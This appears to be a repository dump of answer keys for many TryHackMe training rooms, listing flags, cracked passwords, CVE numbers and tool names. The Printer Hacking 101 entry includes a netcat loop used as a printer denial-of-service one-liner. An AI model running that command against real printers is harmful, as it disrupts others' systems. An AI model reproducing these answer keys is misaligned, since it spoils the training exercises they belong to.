/rooms/confluence cve-2023-22515.txt: -------------------------------------------------------------------------------- 1 | Confluence CVE-2023-22515 2 | https://tryhackme.com/room/confluence202322515 3 | 4 | Log into Confluence with your new credentials. What is the value of the flag posted by admin? 5 | THM{who_needs_keys_anyway} 6 | 7 | Read Chocapikk's script. What is the name of the Confluence user it creates? 8 | pleasepatch 9 | 10 | Is Confluence Server version 8.2.0 vulnerable to CVE-2023-22515? (yea/nay) 11 | yea 12 | 13 | Does applying mitigation actions replace the need to upgrade Confluence? (yea/nay) 14 | nay 15 | -------------------------------------------------------------------------------- /rooms/introduction to flask.txt: -------------------------------------------------------------------------------- 1 | Introduction to Flask 2 | https://tryhackme.com/room/flask 3 | 4 | Which environment variable do you need to change in order to run Flask? 5 | FLASK_APP 6 | 7 | What's the default deployment port used by Flask? 8 | 5000 9 | 10 | Is it possible to change that port? (yay/nay) 11 | yay 12 | 13 | Does Flask support POST requests? (yay/nay) 14 | yay 15 | 16 | What markdown language can you use to make templates for Flask? 17 | HTML 18 | 19 | What's inside /home/flask/flag.txt ? 20 | THM{flask_1njected} 21 | -------------------------------------------------------------------------------- /rooms/ninja skills.txt: -------------------------------------------------------------------------------- 1 | Ninja Skills 2 | https://tryhackme.com/room/ninjaskills 3 | 4 | Which of the above files are owned by the best-group group(enter the answer separated by spaces in alphabetical order) 5 | D8B3 v2Vb 6 | 7 | Which of these files contain an IP address? 8 | oiMO 9 | 10 | Which file has the SHA1 hash of 9d54da7584015647ba052173b84d45e8007eba94 11 | c4ZX 12 | 13 | Which file contains 230 lines? 14 | bny0 15 | 16 | Which file's owner has an ID of 502? 17 | X1Uy 18 | 19 | Which file is executable by everyone? 20 | 8V2L 21 | -------------------------------------------------------------------------------- /rooms/cct2019.txt: -------------------------------------------------------------------------------- 1 | CCT2019 2 | https://tryhackme.com/room/cct2019 3 | 4 | Find the flag. 5 | CCT{h3’s_a_pc@p_w1z@rd_th3re_h4s_g0t_to_6e_a_7w1st} 6 | 7 | What is the key to re3? (Hey, that rhymes) 8 | 31C02DCFDE2FCF727016E2A7054B6DA5 9 | 10 | What is the flag? 11 | CCT{Well_that_wasn’t_such_a_chore_now_was_it?} 12 | 13 | What is the flag for crypto1a? 14 | CCT{Actu411y_a_w@rmup} 15 | 16 | What is the flag for crypto1b? 17 | CCT{th@t_w4s_th4_ea5y_bu770n!} 18 | 19 | What is the flag for crypto1c? 20 | CCT{I_see_dead_ciphers_all_the_time} 21 | -------------------------------------------------------------------------------- /rooms/grep.txt: -------------------------------------------------------------------------------- 1 | Grep 2 | https://tryhackme.com/room/greprtp 3 | 4 | What is the API key that allows a user to register on the website? 5 | ffe60ecaa8bba2f12b43d1a4b15b8f39 6 | 7 | What is the first flag? 8 | THM{4ec9806d7e1350270dc402ba870ccebb} 9 | 10 | What is the email of the "admin" user? 11 | admin@searchme2023cms.grep.thm 12 | 13 | What is the host name of the web application that allows a user to check an email for a possible password leak? 14 | leakchecker.grep.thm 15 | 16 | What is the password of the "admin" user? 17 | admin_tryhackme! 18 | -------------------------------------------------------------------------------- /rooms/vulnerability capstone.txt: -------------------------------------------------------------------------------- 1 | Vulnerability Capstone 2 | https://tryhackme.com/room/vulnerabilitycapstone 3 | 4 | What is the name of the application running on the vulnerable machine? 5 | Fuel CMS 6 | 7 | What is the version number of this application? 8 | 1.4 9 | 10 | What is the number of the CVE that allows an attacker to remotely execute code on this application? 11 | CVE-2018-16763 12 | 13 | What is the value of the flag located on this vulnerable machine? This is located in /home/ubuntu on the vulnerable machine. 14 | THM{ACKME_BLOG_HACKED} 15 | -------------------------------------------------------------------------------- /rooms/adventure time.txt: -------------------------------------------------------------------------------- 1 | Adventure Time 2 | https://tryhackme.com/room/adventuretime 3 | 4 | Content of flag1 – format is tryhackme{************} 5 | tryhackme{Th1s1sJustTh3St4rt} 6 | 7 | Content of flag2 – format is tryhackme{************} 8 | tryhackme{N1c30n3Sp0rt} 9 | 10 | Content of flag3 – format is tryhackme{************} 11 | tryhackme{N0Bl4ckM4g1cH3r3} 12 | 13 | Content of flag4 – format is tryhackme{************} 14 | tryhackme{P1ngu1nsRul3!} 15 | 16 | Content of flag5 – format is tryhackme{************} 17 | tryhackme{Th1s1s4c0d3F0rBM0} 18 | -------------------------------------------------------------------------------- /rooms/gitlab cve-2023-7028.txt: -------------------------------------------------------------------------------- 1 | GitLab CVE-2023-7028 2 | https://tryhackme.com/room/gitlabcve20237028 3 | 4 | What is the name of the field that is sent with a password reset request to prevent CSRF attacks? 5 | authenticity_token 6 | 7 | What is the HTTP method used while sending password reset requests in GitLab? 8 | POST 9 | 10 | Per the above code, what is the API endpoint for getting an updated authenticity token? 11 | /users/password/new 12 | 13 | What is the flag value after successfully sending password reset mail through attack.py? 14 | account_hack#d 15 | -------------------------------------------------------------------------------- /rooms/the quest for least privilige.txt: -------------------------------------------------------------------------------- 1 | The Quest for Least Privilege 2 | https://tryhackme.com/room/thequestforleastprivilege 3 | 4 | If you are denied access while you have this policy, what type of policy is blocking you? 5 | Service Control Policy 6 | 7 | What action is needed in place of XXX? 8 | S3 9 | 10 | What is the redacted EC2 Action required in place of YYY? 11 | Describe 12 | 13 | What is the redacted S3 Action required in place of XXX? 14 | List 15 | 16 | What is the element needed in place of XXXX to represent the AWS Region (Singapore)? 17 | ap-southeast-1 18 | -------------------------------------------------------------------------------- /rooms/advent of cyber 23 side quest.txt: -------------------------------------------------------------------------------- 1 | Advent of Cyber '23 Side Quest 2 | https://tryhackme.com/room/adventofcyber23sidequest 3 | 4 | Side Quest Challenge 1 Flag 5 | 1-1f9548f131522e85ea30e801dfd9b1a4e526003f9e83301faad85e6154ef2834 6 | 7 | Side Quest Challenge 2 Flag 8 | 2-K@bWJ5oHFCR8o%whAvK5qw8Sp$5qf!nCqGM3ksaK 9 | 10 | Side Quest Challenge 3 Flag 11 | 3-d2dc6a02db03401177f0511a6c99007e945d9cb9b96b8c6294f8c5a2c8e01f60 12 | 13 | Side Quest Challenge 4 Flag 14 | 4-3f$FEBwD6AoqnyLjJ!!Hk4tc*V6w$UuK#evLWkBp 15 | 16 | Type NO HINTS to continue. 17 | NO HINTS 18 | -------------------------------------------------------------------------------- /rooms/aws vpc - data exfiltration.txt: -------------------------------------------------------------------------------- 1 | AWS VPC - Data Exfiltration 2 | https://tryhackme.com/room/awsvpcdataexfiltration 3 | 4 | What was the value of "PublicIpv4Pool" in the aws ec2 allocate-address response? 5 | amazon 6 | 7 | What was the Name of the IGW? 8 | VPC-Capstone-IGW 9 | 10 | What is the description of the security group you just compromised? 11 | Super Secure Security Group 12 | 13 | How many Subnets are associated with the "VPC-Capstone Private Subnet NACL"? 14 | 2 15 | 16 | What is the name of the secret space weapon? 17 | Illudium Q-36 Explosive Space Modulator 18 | -------------------------------------------------------------------------------- /rooms/moniker link (cve-2024-21413).txt: -------------------------------------------------------------------------------- 1 | Moniker Link (CVE-2024-21413) 2 | https://tryhackme.com/room/monikerlink 3 | 4 | What "Severity" rating has the CVE been assigned? 5 | Critical 6 | 7 | What Moniker Link type do we use in the hyperlink? 8 | file:// 9 | 10 | What is the special character used to bypass Outlook's "Protected View"? 11 | ! 12 | 13 | What is the name of the application that we use on the AttackBox to capture the user's hash? 14 | responder 15 | 16 | What type of hash is captured once the hyperlink in the email has been clicked? 17 | netNTLMv2 18 | -------------------------------------------------------------------------------- /rooms/archangel.txt: -------------------------------------------------------------------------------- 1 | Archangel 2 | https://tryhackme.com/room/archangel 3 | 4 | Find a different hostname 5 | mafialive.thm 6 | 7 | Find flag 1 8 | thm{f0und_th3_r1ght_h0st_n4m3} 9 | 10 | Look for a page under development 11 | test.php 12 | 13 | Find flag 2 14 | thm{explo1t1ng_lf1} 15 | 16 | Get a shell and find the user flag 17 | thm{lf1_t0_rc3_1s_tr1cky} 18 | 19 | Get User 2 flag 20 | thm{h0r1zont4l_pr1v1l3g3_2sc4ll4t10n_us1ng_cr0n} 21 | 22 | Root the machine and find the root flag 23 | thm{p4th_v4r1abl3_expl01tat1ion_f0r_v3rt1c4l_pr1v1l3g3_3sc4ll4t10n} 24 | -------------------------------------------------------------------------------- /rooms/basic pentesting.txt: -------------------------------------------------------------------------------- 1 | Basic Pentesting 2 | https://tryhackme.com/room/basicpentestingjt 3 | 4 | What is the name of the hidden directory on the web server(enter name without /)? 5 | development 6 | 7 | What is the username? 8 | jan 9 | 10 | What is the password? 11 | armando 12 | 13 | What service do you use to access the server(answer in abbreviation in all caps)? 14 | SSH 15 | 16 | What is the name of the other user you found(all lower case)? 17 | kay 18 | 19 | What is the final password you obtain? 20 | heresareallystrongpasswordthatfollowsthepasswordpolicy$$ 21 | -------------------------------------------------------------------------------- /rooms/breaking rsa.txt: -------------------------------------------------------------------------------- 1 | Breaking RSA 2 | https://tryhackme.com/room/breakrsa 3 | 4 | How many services are running on the box? 5 | 2 6 | 7 | What is the name of the hidden directory on the web server? (without leading '/') 8 | development 9 | 10 | What is the length of the discovered RSA key? (in bits) 11 | 4096 12 | 13 | What are the last 10 digits of n? (where 'n' is the modulus for the public-private key pair) 14 | 1225222383 15 | 16 | What is the numerical difference between p and q? 17 | 1502 18 | 19 | What is the flag? 20 | breakingRSAissuperfun20220809134031 21 | -------------------------------------------------------------------------------- /rooms/network security.txt: -------------------------------------------------------------------------------- 1 | Network Security 2 | https://tryhackme.com/room/intronetworksecurity 3 | 4 | What type of firewall is Windows Defender Firewall? 5 | Host Firewall 6 | 7 | During which step of the Cyber Kill Chain does the attacker gather information about the target? 8 | Recon 9 | 10 | What is the password in the secret.txt file? 11 | ABC789xyz123 12 | 13 | What is the content of the flag.txt in the /root directory? 14 | THM{FTP_SERVER_OWNED} 15 | 16 | What is the content of the flag.txt in the /home/librarian directory? 17 | THM{LIBRARIAN_ACCOUNT_COMPROMISED} 18 | -------------------------------------------------------------------------------- /rooms/mnemonic.txt: -------------------------------------------------------------------------------- 1 | Mnemonic 2 | https://tryhackme.com/room/mnemonic 3 | 4 | How many open ports? 5 | 3 6 | 7 | what is the ssh port number? 8 | 1337 9 | 10 | what is the name of the secret file? 11 | backups.zip 12 | 13 | ftp user name? 14 | ftpuser 15 | 16 | ftp password? 17 | love4ever 18 | 19 | What is the ssh username? 20 | james 21 | 22 | What is the ssh password? 23 | bluelove 24 | 25 | What is the condor password? 26 | pasificbell1981 27 | 28 | user.txt 29 | THM{a5f82a00e2feee3465249b855be71c01} 30 | 31 | root.txt 32 | THM{2a4825f50b0c16636984b448669b0586} 33 | -------------------------------------------------------------------------------- /rooms/mothers secret.txt: -------------------------------------------------------------------------------- 1 | Mother's Secret 2 | https://tryhackme.com/room/codeanalysis 3 | 4 | What is the number of the emergency command override? 5 | 100375 6 | 7 | What is the special order number? 8 | 937 9 | 10 | What is the hidden flag in the Nostromo route? 11 | Flag{X3n0M0Rph} 12 | 13 | What is the name of the Science Officer with permissions? 14 | Ash 15 | 16 | What are the contents of the classified "Flag" box? 17 | THM_FLAG{0RD3R_937} 18 | 19 | Where is Mother's secret? 20 | /opt/m0th3r 21 | 22 | What is Mother's secret? 23 | Flag{Ensure_return_of_organism_meow_meow!} 24 | -------------------------------------------------------------------------------- /rooms/security awareness.txt: -------------------------------------------------------------------------------- 1 | Security Awareness 2 | https://tryhackme.com/room/securityawarenessintro 3 | 4 | How many people were affected by eBay being hacked? 5 | 145 million 6 | 7 | What data was leaked from Playstation being hacked? 8 | names, addresses, e-mail, birth dates 9 | 10 | Who would most likely be interested in exploiting a business? 11 | Cybercriminals 12 | 13 | Who would most likely be interested in exploiting a personal computer for fun? 14 | Thrill-seekers 15 | 16 | Who would most likely be interested in exploiting a website to deliver a message? 17 | Hacktivists 18 | -------------------------------------------------------------------------------- /rooms/server-side template injection.txt: -------------------------------------------------------------------------------- 1 | Server-side Template Injection 2 | https://tryhackme.com/room/serversidetemplateinjection 3 | 4 | What is the content of the hidden text file in the server directory? 5 | THM{0739eea78f5c7f4b1690737c6258e38b} 6 | 7 | What is the content of the hidden text file in the server directory? 8 | THM{1f8c3b32ad3217e84c145398bae00876} 9 | 10 | What is the content of the hidden text file in the server directory? 11 | THM{ecc43642dd6934d37c69598174e6e126} 12 | 13 | What is the content of the hidden text file in the server directory? 14 | THM{w0rK1Ng_sST1} 15 | -------------------------------------------------------------------------------- /rooms/idor.txt: -------------------------------------------------------------------------------- 1 | IDOR 2 | https://tryhackme.com/room/idor 3 | 4 | What does IDOR stand for? 5 | Insecure Direct Object Reference 6 | 7 | What is the Flag from the IDOR example website? 8 | THM{IDOR-VULN-FOUND} 9 | 10 | What is a common type of encoding used by websites? 11 | base64 12 | 13 | What is a common algorithm used for hashing IDs? 14 | md5 15 | 16 | What is the minimum number of accounts you need to create to check for IDORs between accounts? 17 | 2 18 | 19 | What is the username for user id 1? 20 | adam84 21 | 22 | What is the email address for user id 3? 23 | j@fakemail.thm 24 | -------------------------------------------------------------------------------- /rooms/the return of the yeti.txt: -------------------------------------------------------------------------------- 1 | The Return of the Yeti 2 | https://tryhackme.com/room/adv3nt0fdbopsjcap 3 | 4 | What's the name of the WiFi network in the PCAP? 5 | FreeWifiBFC 6 | 7 | What's the password to access the WiFi network? 8 | Christmas 9 | 10 | What suspicious tool is used by the attacker to extract a juicy file from the server? 11 | mimikatz 12 | 13 | What is the case number assigned by the CyberPolice to the issues reported by McSkidy? 14 | 31337-0 15 | 16 | What is the content of the yetikey1.txt file? 17 | 1-1f9548f131522e85ea30e801dfd9b1a4e526003f9e83301faad85e6154ef2834 18 | -------------------------------------------------------------------------------- /rooms/nanocherryctf.txt: -------------------------------------------------------------------------------- 1 | NanoCherryCTF 2 | https://tryhackme.com/room/nanocherryctf 3 | 4 | Gain access to Molly's Dashboard. What is the flag? 5 | THM{BL4CK_M4I1} 6 | 7 | What is the first part of Chad Cherry's password? 8 | n4n0ch3rry 9 | 10 | What is the second part of Chad Cherry's password? 11 | w1llb3 12 | 13 | What is the third part of Chad Cherry's password? 14 | 7h3fu7ur3 15 | 16 | Put the three parts of Chad Cherry's password together and access his account. What is the flag you obtained? 17 | THM{P4SS3S_C0LL3CT3D} 18 | 19 | What is the root flag? 20 | THM{YOU_NEVER_WERE_A_SCRIPT_KIDDIE} 21 | -------------------------------------------------------------------------------- /rooms/new york flankees.txt: -------------------------------------------------------------------------------- 1 | New York Flankees 2 | https://tryhackme.com/room/thenewyorkflankees 3 | 4 | What is the cleartext value of the decrypted blob (the format is element1:element2)? 5 | stefan1197:ebb2B76@62#f??7cA6B76@6!@62#f6dacd2599 6 | 7 | What is the flag in the admin panel? 8 | THM{a4113536187c6e84637a1ee2ec5359eca17bbbd1b2629b23dbfd3b4ce2f30604} 9 | 10 | Dig around in the container. What is the second flag? 11 | THM{342878cd14051bd787352ee73c75381b1803491e4e5ac729a91a03e3c889c2bf} 12 | 13 | What is the final flag? 14 | THM{b3653cb04abf4a5b9c7a77ec52f550e73416b6e61015b8014fff9831a7eb61ce} 15 | -------------------------------------------------------------------------------- /rooms/res.txt: -------------------------------------------------------------------------------- 1 | Res 2 | https://tryhackme.com/room/res 3 | 4 | Scan the machine, how many ports are open? 5 | 2 6 | 7 | What's is the database management system installed on the server? 8 | redis 9 | 10 | What port is the database management system running on? 11 | 6379 12 | 13 | What's is the version of management system installed on the server? 14 | 6.0.7 15 | 16 | Compromise the machine and locate user.txt 17 | thm{red1s_rce_w1thout_credent1als} 18 | 19 | What is the local user account password? 20 | beautiful1 21 | 22 | Escalate privileges and obtain root.txt 23 | thm{xxd_pr1v_escalat1on} 24 | -------------------------------------------------------------------------------- /rooms/atlassian cve-2022-26134.txt: -------------------------------------------------------------------------------- 1 | Atlassian CVE-2022-26134 2 | https://tryhackme.com/room/cve202226134 3 | 4 | What is the full CVE entry for this exploit? 5 | CVE-2022-26134 6 | 7 | You discover a server running Confluence with the version of 7.16.2, is this vulnerable? 8 | yay 9 | 10 | What does the acronym OGNL stand for? 11 | Object-Graph Navigation Language 12 | 13 | Craft a payload to identify what user the application is running as. What is the user? 14 | confluence 15 | 16 | Finally, craft a payload to retrieve the flag stored at /flag.txt on MACHINE_IP. What is the flag? 17 | THM{OGNL_VULN} 18 | -------------------------------------------------------------------------------- /rooms/amazon ec2 - data exfiltration.txt: -------------------------------------------------------------------------------- 1 | Amazon EC2 - Data Exfiltration 2 | https://tryhackme.com/room/amazonec2dataexfiltration 3 | 4 | What is the name of the Role attached to the instance vulnerable to the SSRF? 5 | StarStarWAFRole 6 | 7 | What is the cloud-config line to enable password-based ssh authentication? 8 | ssh_pwauth: True 9 | 10 | What is the name of the shell script in ec2-user's home directory? 11 | create_instance.sh 12 | 13 | What was the password you needed to get into SecretDataInstance? 14 | TryHackMe 15 | 16 | Enter the secret phrase. 17 | Congrats! You've found and are able to exfiltrate the secret data. 18 | -------------------------------------------------------------------------------- /rooms/block.txt: -------------------------------------------------------------------------------- 1 | Block 2 | https://tryhackme.com/room/blockroom 3 | 4 | What is the username of the first person who accessed our server? 5 | mrealman 6 | 7 | What is the password of the user in question 1? 8 | Blockbuster1 9 | 10 | What is the flag that the first user got access to? 11 | THM{SmB_DeCrypTing_who_Could_Have_Th0ughT} 12 | 13 | What is the username of the second person who accessed our server? 14 | eshellstrop 15 | 16 | What is the hash of the user in question 4? 17 | 3f29138a04aadc19214e9c04028bf381 18 | 19 | What is the flag that the second user got access to? 20 | THM{No_PasSw0Rd?_No_Pr0bl3m} 21 | -------------------------------------------------------------------------------- /rooms/defensive security intro.txt: -------------------------------------------------------------------------------- 1 | Defensive Security Intro 2 | https://tryhackme.com/room/defensivesecurityintro 3 | 4 | Which team focuses on defensive security? 5 | Blue Team 6 | 7 | What would you call a team of cyber security professionals that monitors a network and its systems for malicious events? 8 | Security Operations Center 9 | 10 | What does DFIR stand for? 11 | Digital Forensics and Incident Response 12 | 13 | Which kind of malware requires the user to pay money to regain access to their files? 14 | Ransomware 15 | 16 | What is the flag that you obtained by following along? 17 | THM{THREAT-BLOCKED} 18 | -------------------------------------------------------------------------------- /rooms/avengers blog.txt: -------------------------------------------------------------------------------- 1 | Avengers Blog 2 | https://tryhackme.com/room/avengers 3 | 4 | On the deployed Avengers machine you recently deployed, get the flag1 cookie value. 5 | cookie_secrets 6 | 7 | Look at the HTTP response headers and obtain flag 2. 8 | headers_are_important 9 | 10 | Look around the FTP share and read flag 3! 11 | 8fc651a739befc58d450dc48e1f1fd2e 12 | 13 | What is the directory that has an Avengers login? 14 | /portal 15 | 16 | Log into the Avengers site. View the page source, how many lines of code are there? 17 | 223 18 | 19 | Read the contents of flag5.txt 20 | d335e2d13f36558ba1e67969a1718af7 21 | -------------------------------------------------------------------------------- /rooms/corp.txt: -------------------------------------------------------------------------------- 1 | Corp 2 | https://tryhackme.com/room/corp 3 | 4 | Access the file and obtain the flag. 5 | flag{a12a41b5f8111327690f836e9b302f0b} 6 | 7 | Running that command, we find an existing SPN. What user is that for? 8 | fela 9 | 10 | Crack the hash. What is the users password in plain text? 11 | rubenF124 12 | 13 | Login as this user. What is his flag? 14 | flag{bde1642535aa396d2439d86fe54a36e4} 15 | 16 | What is the decoded password? 17 | tqjJpEX9Qv8ybKI3yHcc=L!5e(!wW;​ $T 18 | 19 | Now we have the Administrator's password, login as them and obtain the last flag. 20 | THM{g00d_j0b_SYS4DM1n_M4s73R} 21 | 22 | -------------------------------------------------------------------------------- /rooms/frosteau busy with vim.txt: -------------------------------------------------------------------------------- 1 | Frosteau Busy with Vim 2 | https://tryhackme.com/room/busyvimfrosteau 3 | 4 | What is the value of the first flag? 5 | THM{Let.the.game.begin} 6 | 7 | What is the value of the second flag? 8 | THM{Seems.like.we.are.getting.busy} 9 | 10 | What is the value of the third flag? 11 | THM{Not.all.roots.and.routes.are.equal} 12 | 13 | What is the value of the fourth flag? 14 | THM{Frosteau.would.be.both.proud.and.disappointed} 15 | 16 | What is the value of the third Yetikey that has been placed in the root directory to verify the compromise? 17 | 3-d2dc6a02db03401177f0511a6c99007e945d9cb9b96b8c6294f8c5a2c8e01f60 18 | -------------------------------------------------------------------------------- /rooms/iam credentials.txt: -------------------------------------------------------------------------------- 1 | IAM Credentials 2 | https://tryhackme.com/room/iamcredentials 3 | 4 | What is the minimum number of numbers required in the password policy? 5 | 0 6 | 7 | How many active IAM Access Keys does the TryHackMe-IAM-User have? 8 | 1 9 | 10 | Which user has an MFA attached to it? 11 | TryHackMe-IAM-User 12 | 13 | What account ID does "AKIASTZ6PFXLJW3RQWXC" belong to? 14 | 179982773718 15 | 16 | Use the CloudShell and the curl command above to download temporary credentials, what is the JSON key that begins with "E"? 17 | Expiration 18 | 19 | When using temporary credentials, what are the first four letters of the AccessKeyId? 20 | ASIA 21 | -------------------------------------------------------------------------------- /rooms/soar.txt: -------------------------------------------------------------------------------- 1 | SOAR 2 | https://tryhackme.com/room/soar 3 | 4 | Under which SOC generation did SIEM tools emerge? 5 | Second 6 | 7 | How would you describe the experience of having an overload of security events being triggered within a SOC? 8 | Alert Fatigue 9 | 10 | The act of connecting and integrating security tools and systems into seamless workflows is known as? 11 | Security Orchestration 12 | 13 | What do we call a predefined list of actions to handle an incident? 14 | Playbook 15 | 16 | Are manual analyses vital within a SOAR workflow? yay or nay? 17 | yay 18 | 19 | What is the flag received? 20 | THM{AUT0M@T1N6_S3CUR1T¥} 21 | 22 | -------------------------------------------------------------------------------- /rooms/tshark challenge i teamwork.txt: -------------------------------------------------------------------------------- 1 | TShark: Challenge I: Teamwork 2 | https://tryhackme.com/room/tsharkchallengesone 3 | 4 | What is the full URL of the malicious/suspicious domain address? 5 | hxxp[://]www[.]paypal[.]com4uswebappsresetaccountrecovery[.]timeseaways[.]com/ 6 | 7 | When was the URL of the malicious/suspicious domain address first submitted to VirusTotal? 8 | 2017-04-17 22:52:53 UTC 9 | 10 | Which known service was the domain trying to impersonate? 11 | PayPal 12 | 13 | What is the IP address of the malicious domain? 14 | 184[.]154[.]127[.]226 15 | 16 | What is the email address that was used? 17 | johnny5alive[at]gmail[.]com 18 | -------------------------------------------------------------------------------- /rooms/resource policies & scps.txt: -------------------------------------------------------------------------------- 1 | Resource Policies & SCPs 2 | https://tryhackme.com/room/resourcepoliciesscps 3 | 4 | Try running the S3api command "get-bucket-ownership-controls" against the tryhackme-public-bucket. What is the ObjectOwnership value set to? 5 | BucketOwner Preferred 6 | 7 | Try invoking the Lambda function "TryHackMe-quote" in the same 019181489476 Account. What's the quote returned from the function? 8 | Most heard comment at #reinvent 'dude, lambda is the coolest shit, ever' -- Werner Vogles 2014 9 | 10 | What are the last four words of the error message you get when attempting to disable GuardDuty with this command? 11 | with an explicit deny 12 | -------------------------------------------------------------------------------- /rooms/snort challenge - live attacks.txt: -------------------------------------------------------------------------------- 1 | Snort Challenge - Live Attacks 2 | https://tryhackme.com/room/snortchallenges2 3 | 4 | Stop the attack and get the flag (which will appear on your Desktop) 5 | THM{81b7fef657f8aaa6e4e200d616738254} 6 | 7 | What is the name of the service under attack? 8 | SSH 9 | 10 | What is the used protocol/port in the attack? 11 | TCP/22 12 | 13 | Stop the attack and get the flag (which will appear on your Desktop) 14 | THM{0ead8c494861079b1b74ec2380d2cd24} 15 | 16 | What is the used protocol/port in the attack? 17 | tcp/4444 18 | 19 | Which tool is highly associated with this specific port number? 20 | Metasploit 21 | -------------------------------------------------------------------------------- /rooms/tokyo ghoul.txt: -------------------------------------------------------------------------------- 1 | Tokyo Ghoul 2 | https://tryhackme.com/room/tokyoghoul666 3 | 4 | How many ports are open ? 5 | 3 6 | 7 | What is the OS used ? 8 | ubuntu 9 | 10 | Did you find the note that the others ghouls gave you? where did you find it ? 11 | jasonroom.html 12 | 13 | What is the key for Rize executable? 14 | kamishiro 15 | 16 | What the message mean did you understand it ? what it says? 17 | d1r3c70ry_center 18 | 19 | What is rize username ? 20 | kamishiro 21 | 22 | What is rize password ? 23 | password123 24 | 25 | user.txt 26 | e6215e25c0783eb4279693d9f073594a 27 | 28 | root.txt 29 | 9d790bb87898ca66f724ab05a9e6000b 30 | -------------------------------------------------------------------------------- /rooms/printer hacking 101.txt: -------------------------------------------------------------------------------- 1 | Printer Hacking 101 2 | https://tryhackme.com/room/printerhacking101 3 | 4 | What port does IPP run on? 5 | 631 6 | 7 | How would a simple printer TCP DoS attack look as a one-line command? 8 | while true; do nc printer 9100; done 9 | 10 | Review the cheat sheet provided in the task reading above. What attack are printers often vulnerable to which involves sending more and more information until a pre-allocated buffer size is surpassed? 11 | Buffer Overflow 12 | 13 | Connect to the printer per the instructions above. Where's the Fox_Printer located? 14 | Skidy's basement 15 | 16 | What is the size of a test sheet? 17 | 1k 18 | -------------------------------------------------------------------------------- /rooms/putting it all together.txt: -------------------------------------------------------------------------------- 1 | Putting it all together 2 | https://tryhackme.com/room/puttingitalltogether 3 | 4 | What can be used to host static files and speed up a clients visit to a website? 5 | CDN 6 | 7 | What does a load balancer perform to make sure a host is still alive? 8 | health check 9 | 10 | What can be used to help against the hacking of a website? 11 | WAF 12 | 13 | What does web server software use to host multiple sites? 14 | Virtual Hosts 15 | 16 | What is the name for the type of content that can change? 17 | Dynamic 18 | 19 | Does the client see the backend code? Yay/Nay 20 | Nay 21 | 22 | Flag 23 | THM{YOU_GOT_THE_ORDER} 24 | -------------------------------------------------------------------------------- /rooms/intro to endpoint security.txt: -------------------------------------------------------------------------------- 1 | Intro to Endpoint Security 2 | https://tryhackme.com/room/introtoendpointsecurity 3 | 4 | What is the normal parent process of services.exe? 5 | wininit.exe 6 | 7 | What is the name of the network utility tool introduced in this task? 8 | TCPView 9 | 10 | Where do the Windows Event logs (.evtx files) typically reside? 11 | C:\Windows\System32\winevt\Logs 12 | 13 | Provide the command used to enter OSQuery CLI. 14 | osqueryi 15 | 16 | What does EDR mean? Provide the answer in lowercase. 17 | endpoint detection and Response 18 | 19 | Provide the flag for the simulated investigation activity. 20 | THM{3ndp01nt_s3cur1ty!} 21 | -------------------------------------------------------------------------------- /rooms/signature evasion.txt: -------------------------------------------------------------------------------- 1 | Signature Evasion 2 | https://tryhackme.com/room/signatureevasion 3 | 4 | To the nearest kibibyte, what is the first detected byte? 5 | 51000 6 | 7 | At what offset was the end of bad bytes for the file? 8 | 0xC544 9 | 10 | What flag is found after uploading a properly obfuscated snippet? 11 | THM{70_D373C7_0r_70_N07_D373C7} 12 | 13 | Rounded to three decimal places, what is the Shannon entropy of the file? 14 | 6.354 15 | 16 | What flag is found after uploading a properly obfuscated snippet? 17 | THM{N0_1MP0r75_F0r_Y0U} 18 | 19 | What is the flag found on the Administrator desktop? 20 | THM{08FU5C4710N_15 MY_10V3_14N6U463} 21 | 22 | -------------------------------------------------------------------------------- /rooms/ret2libc.txt: -------------------------------------------------------------------------------- 1 | ret2libc 2 | https://tryhackme.com/room/ret2libc 3 | 4 | What is the name of the function which is essential for ret2libc attack? 5 | system 6 | 7 | What are the permissions of the exploit_me binary? 8 | -rwsrwxr-x 1 root root 9 | 10 | At which address will exploit_me binary start? 11 | 0x400000 12 | 13 | What is the overflow offset that we found in gdb? 14 | 18 15 | 16 | What is the name of the section of the binary which is important for our leak? 17 | .got.plt 18 | 19 | What is the name of the function that is under gets in .got.plt? 20 | setuid 21 | 22 | What is the flag? 23 | thm{dGhlIG1vc3QgcmFuZG9tIHZhbHVlIHlvdSBjb3VsZCBldmVyIGd1ZXNz} 24 | -------------------------------------------------------------------------------- /rooms/walking an application.txt: -------------------------------------------------------------------------------- 1 | Walking An Application 2 | https://tryhackme.com/room/walkinganapplication 3 | 4 | What is the flag from the HTML comment? 5 | THM{HTML_COMMENTS_ARE_DANGEROUS} 6 | 7 | What is the flag from the secret link? 8 | THM{NOT_A_SECRET_ANYMORE} 9 | 10 | What is the directory listing flag? 11 | THM{INVALID_DIRECTORY_PERMISSIONS} 12 | 13 | What is the framework flag? 14 | THM{KEEP_YOUR_SOFTWARE_UPDATED} 15 | 16 | What is the flag behind the paywall? 17 | THM{NOT_SO_HIDDEN} 18 | 19 | What is the flag in the red box? 20 | THM{CATCH_ME_IF_YOU_CAN} 21 | 22 | What is the flag shown on the contact-msg network request? 23 | THM{GOT_AJAX_FLAG} 24 | -------------------------------------------------------------------------------- /rooms/kiba.txt: -------------------------------------------------------------------------------- 1 | kiba 2 | https://tryhackme.com/room/kiba 3 | 4 | What is the vulnerability that is specific to programming languages with prototype-based inheritance? 5 | Prototype pollution 6 | 7 | What is the version of visualization dashboard installed in the server? 8 | 6.5.4 9 | 10 | What is the CVE number for this vulnerability? This will be in the format: CVE-0000-0000 11 | CVE-2019-7609 12 | 13 | Compromise the machine and locate user.txt 14 | THM{1s_easy_pwn3d_k1bana_w1th_rce} 15 | 16 | How would you recursively list all of these capabilities? 17 | getcap -r / 18 | 19 | Escalate privileges and obtain root.txt 20 | THM{pr1v1lege_escalat1on_us1ng_capab1l1t1es} 21 | -------------------------------------------------------------------------------- /rooms/sweettooth inc..txt: -------------------------------------------------------------------------------- 1 | Sweettooth Inc. 2 | https://tryhackme.com/room/sweettoothinc 3 | 4 | Do a TCP portscan. What is the name of the database software running on one of these ports? 5 | influxdb 6 | 7 | What is the database user you find? 8 | o5yY6yya 9 | 10 | What was the temperature of the water tank at 1621346400 (UTC Unix Timestamp)? 11 | 22.5 12 | 13 | What is the highest rpm the motor of the mixer reached? 14 | 4875 15 | 16 | What username do you find in one of the databases? 17 | uzJk6Ry98d8C 18 | 19 | user.txt 20 | THM{V4w4FhBmtp4RFDti} 21 | 22 | /root/root.txt 23 | THM{5qsDivHdCi2oabwp} 24 | 25 | The second /root/root.txt 26 | THM{nY2ZahyFABAmjrnx} 27 | -------------------------------------------------------------------------------- /rooms/alfred.txt: -------------------------------------------------------------------------------- 1 | Alfred 2 | https://tryhackme.com/room/alfred 3 | 4 | How many ports are open? (TCP only) 5 | 3 6 